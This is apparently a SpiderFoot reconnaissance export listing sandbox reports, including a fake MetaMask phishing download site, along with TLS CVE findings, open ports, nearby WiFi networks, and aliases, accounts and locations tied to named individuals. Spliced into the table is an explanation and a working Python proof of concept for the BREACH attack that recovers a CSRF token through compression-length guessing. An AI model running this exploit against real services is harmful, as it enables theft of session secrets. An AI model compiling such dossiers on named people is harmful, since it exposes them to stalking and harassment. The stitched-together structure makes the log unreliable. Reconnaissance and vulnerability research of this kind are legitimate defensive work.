| 2023-05-12 02:48:47 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://n.top/i,right:n.right/a,bottom:n.bottom/i,left:n.left/a,x:n.left/a,y:n.top/i', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://u8718684.ct.sendgrid.net/ls/click?upn=c5xukOe5Km-2FX79RKM6mUHkScXT7d3MNfbWP0FHOMHMSulHtt7TNqqdRBsqy10BrNUPGt1JnDtK6UMujmNu-2Bt5QYPlc-2BQrkgsqzJjN5vxSR6z81-2Fizrzyogjzfo-2BS9lx85Rb5sSUZZtUDNWUm86HtmS9EQuA-2BU4RfDy5n3r8sM3E-3DN0PW_-2F2Ce3NhTMiWIwvgWzERJRAygrU5zMIOZQxSuADrBlh7TNOxfvwo3CxH1Ohu8ySaee3krnnMOpDWXeZ1Bk4KZX9BkUZ8Edttb71LkdIzlOxeoHONdzpW8pWlgXqx83YJopFXPvRQGIv7Sn6HH66wOe3aU2Y0Prx-2FGZ3tSyA-2BkVN0gySn2zKqzQQmjicFw5za2NlxBl9CrGRWVutMdwUrhmoYf-2FXzIW7IQrIrlKUnWzPPY-2FpjVlisUhaE4YaXyGPCLka2hWOa0554QN2BjNnsHe6dwjndEUsQJ85b-2FnY955ArnKu76MKNRVCnjUZuZzCTQRtAnEn328443nOkyocNgPHpNa-2BICLRgB6RuqAUvD3kdSXakjxhKyTs0-2Bkt1Te3Tb-2B8aJjG6GIstuUjl-2BbQLHM-2FGnlea9WKNJpf8hKv6-2B7JI-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4036"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_IE_EarlyTabStart_0xb90_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_ConnHashTable<4036>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fc4_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_fc4_IESQMMUTEX_0_519"\n "IsoScope_fc4_IE_EarlyTabStart_0xb90_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.121:443"\n "104.18.6.8:443"\n "156.146.53.13:443"\n "152.199.5.152:443"\n "151.101.2.137:443"\n "162.247.241.2:443"\n "74.125.137.155:443"\n "13.227.74.109:443"\n "34.192.63.2:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bam-cell.nr-data.net"\n "cdn.ezshield.net"\n "cigna.identityforce.com"\n "js-agent.newrelic.com"\n "maxst.icons8.com"\n "platform.linkedin.com"\n "purecatamphetamine.github.io"\n "secure.identityforce.com"\n "stats.g.doubleclick.net"\n "u8718684.ct.sendgrid.net"'}, {u'category': u'General', u'origin': 
u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"platform.linkedin.com" (Indicator: "linkedin.com")\n "{state:0,transportUrl:b,context:c,parent:ki()},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+ke.ca+"&cx=c";No()&&(f+="&sign="+ke.Zd);var g=te||ve?Mo(b,f):void 0;g||(g=wl("https://","http://",ke.qd+f));ei().destination[a]={state:1,context:c,parent:ki()};Hb(g)}};function Oo(){if(ci()){return!0}return!1};var Ro=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),So={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},To={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "GET /badges/js/profile.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://cigna.identityforce.com/app/Register?Type=PROVISIONAL&VALUE=C66B9A18A6A7&RETAILERCODE=Cigna&GNDNRLL=PSSAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: platform.linkedin.comDNT: 1Connection: Keep-Alive" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors 
marked dropped file "Tar280F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar27BF.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab27BE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab27BE.tmp]- [targetUID: 00000000-00000732]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000732]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"US_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "main.fe4aff76.chunk_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "2.96415f03.chunk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "gtm_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "application_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "la-solid-900_1_.eot" has type "Embedded OpenType (EOT) la-solid-900 family"- [targetUID: 
N/A]\n "Tar280F.tmp" has type "data"- Location: [%TEMP%\\Tar280F.tmp]- [targetUID: 00000000-00000732]\n "saleslanding_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "line-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Cab27BE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab27BE.tmp]- [targetUID: 00000000-00000732]\n "analytics_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "nr-spa-1212.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "2.6b2b9e73.chunk_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "IDF_Cigna_1_.png" has type "PNG image data 801 x 98 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "trustev.min_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "Register_1_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "la-regular-400_1_.eot" has type "Embedded OpenType (EOT) la-regular-400 family"- [targetUID: N/A]\n "open-sans-v17-latin-800.8ab0bbdd_1_.woff" has type "Web Open Font Format TrueType length 19072 version 1.1"- [targetUID: N/A]\n "open-sans-v17-latin-700.f24f4bce_1_.woff" has type "Web Open Font Format TrueType length 18900 version 1.1"- [targetUID: N/A]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-39', u'name': u'Drops XML files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 8, u'description': u'"cigna.identityforce_1_.xml" has type "Unknown"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in 
binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://u8718684.ct.sendgrid.net/ls/click?upn=c5xukOe5Km-2FX79RKM6mUHkScXT7d3MNfbWP0FHOMHMSulHtt7TNqqdRBsqy10BrNUPGt1JnDtK6UMujmNu-2Bt5QYPlc-2BQr | 185.199.110.153 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.191): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | avanticom (Net ID: 00:02:6F:09:A3:B6) | 50.1188, 8.6843 |
| 2023-05-12 02:53:28 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://www.metawalletss.com/download.html', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d58_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d58_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3416"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d58_ConnHashTable<3416>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_d58_IESQMMUTEX_0_519"\n "IsoScope_d58_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d58_IE_EarlyTabStart_0xa74_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3416"'}, {u'category': u'General', u'origin': u'Network Traffic', 
u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.211:80"\n "154.82.100.211:443"\n "142.250.189.202:443"\n "142.250.189.234:443"\n "142.250.191.35:443"\n "43.251.41.15:443"\n "185.199.109.153:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.metawalletss.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "metamask.io"\n "va.v.liveperson.net"\n "www.metawalletss.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "<meta content="MetaMask Download" property="twitter:title">" (Indicator: "dir "; File: "download_2_.htm")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "download_2_.htm")\n Found string 
"<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "download_2_.htm")\n Found string "<meta content="summary_large_image" name="twitter:card">" (Indicator: "dir "; File: "download_2_.htm")\n Found string "<a href="javascript:;" rel="noreferer\n noopener" target="_blank" class="footer-link">Twitter</a>" (Indicator: "dir "; File: "download_2_.htm")\n file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found 
string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:after {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"download-android_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlaced" and extension "png"\n "download-extension_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlaced" and extension "png"\n "download-ios_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlaced" and extension "png"\n "Edge_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced" and extension "png"\n "Brave_1_.png" has type "PNG image data 200 x 200 8-bit/color RGBA non-interlaced" and extension "png"\n "Firefox_1Firefox_1_.png" has type "PNG image data 107 x 100 8-bit/color RGBA non-interlaced" and extension "png"\n "chrome_1chrome_1_.png" has type "PNG image data 100 x 100 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': 
None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eedc9fcb-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{eedc9fcd-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd28e17afbccfac18.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{eedc9fcd-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd28e17afbccfac18.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df659f277b3559949f.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eedc9fcb-e932-11ed-bd1f-08002780763e}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\0x82k3c6.txt"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"mm-logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n 
"webflow_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n ".jsonp_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "metamask-staging-2.webflow_1_.css" has type "ASCII text"- [targetUID: N/A]\n "download-android_1_.png" has type "PNG image data 1328 x 676 8-bit/color RGBA non-interlace | 185.199.109.153 |
| 2023-05-12 02:56:54 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.135.9 | www.ayhu.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | JBZD (Category: images)
https://jbzd.com.pl/uzytkownik/login | login |
| 2023-05-12 03:01:48 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 0 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | www.battleb0t.xyz |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | nginx | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:14 GMT", "content-type": "text/html"} |
| 2023-05-12 03:13:42 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 0 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 87.248.157.102 |
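The BREACH row above is a compression side channel, not a TLS bug: any response that gzips attacker-influenced input in the same body as a secret leaks that secret through the ciphertext length, which is why testssl.sh reports it whenever the server answers with a compressed body (the `content-encoding: gzip` on the nginx host in this table is consistent with that). The script below is an added illustration, not output of testssl.sh or SpiderFoot and not code from the scanned hosts: it renders a constructed page with a hypothetical CSRF token, uses the DEFLATE output size as the only oracle and recovers the token one character at a time. The page, the token, the `csrf` field name and the reflected search string are all invented for the demo. Static Huffman coding (`Z_FIXED`) is forced so that one extra byte of LZ77 match is exactly one byte of output; a real server's dynamic Huffman tables add noise that the published attack cancels with repeated or padded measurements.

```python
"""Toy BREACH (CVE-2013-3587) length oracle against a constructed page.

Added example. The page, the hidden csrf token and the reflected search
string are invented; nothing here is taken from the scanned hosts.
"""
import zlib

SECRET = "a7f3c9e1"             # hypothetical per-session CSRF token
ALPHABET = "0123456789abcdef"   # attacker's assumption about its charset


def render_page(reflected: str, secret: str = SECRET) -> bytes:
    """Server-side template: the token sits in a hidden input and the
    attacker-controlled search string is echoed later in the same body."""
    return (
        '<html><body><form>'
        f'<input type="hidden" name="csrf" value="{secret}">'
        f'</form><div>Search: {reflected}</div></body></html>'
    ).encode()


def compressed_length(body: bytes) -> int:
    """What a passive observer learns from TLS: the compressed body size.
    Z_FIXED keeps the Huffman tables static, so extending the back-reference
    by one byte saves exactly one 8-bit literal, i.e. one output byte."""
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 9, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


def oracle(guess: str) -> int:
    """One request: echo a string that mimics the token's context so the
    correct guess becomes a longer LZ77 match into the real hidden field."""
    return compressed_length(render_page('name="csrf" value="' + guess))


def recover_secret(length: int = len(SECRET)) -> str:
    """Byte-at-a-time recovery: the guess that extends the match compresses
    one byte smaller than every wrong guess, so the minimum is unique."""
    known = ""
    for _ in range(length):
        known += min(ALPHABET, key=lambda ch: oracle(known + ch))
    return known


if __name__ == "__main__":
    print("recovered token:", recover_secret())
```

Each recovered byte costs sixteen requests here; the defence is to stop compressing responses that mix secrets with reflected input, or to mask the token per request so no two responses carry the same byte sequence.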
| 2023-05-12 03:27:54 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.138:8080 | 188.114.96.0/24 |
| 2023-05-12 02:44:03 | Human Name | No | SpiderFoot UI | 2 | 0 | 0 | 0 | None | Patrick Pogoda | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | nore (Net ID: 00:01:E3:0B:96:F0) | 50.1188, 8.6843 |
| 2023-05-12 03:23:50 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.20:8080 | 188.114.96.0/24 |
| 2023-05-12 02:55:27 | Physical Location | No | URLScan.io | 0 | 0 | 1 | 0 | None | DE | battleb0t.xyz |
| 2023-05-12 03:11:12 | Physical Coordinates | No | OpenStreetMap | 74 | 0 | 4 | 0 | None | 33.617190550339146,-111.90827887019054 | 14455 North Hayden Rd, Scottsdale, US-AZ, US, 85260 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:53:19 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 3 | 0 | None | VirusTotal [34.74.170.74]
https://www.virustotal.com/en/ip-address/34.74.170.74/information/ | 34.74.170.74 |
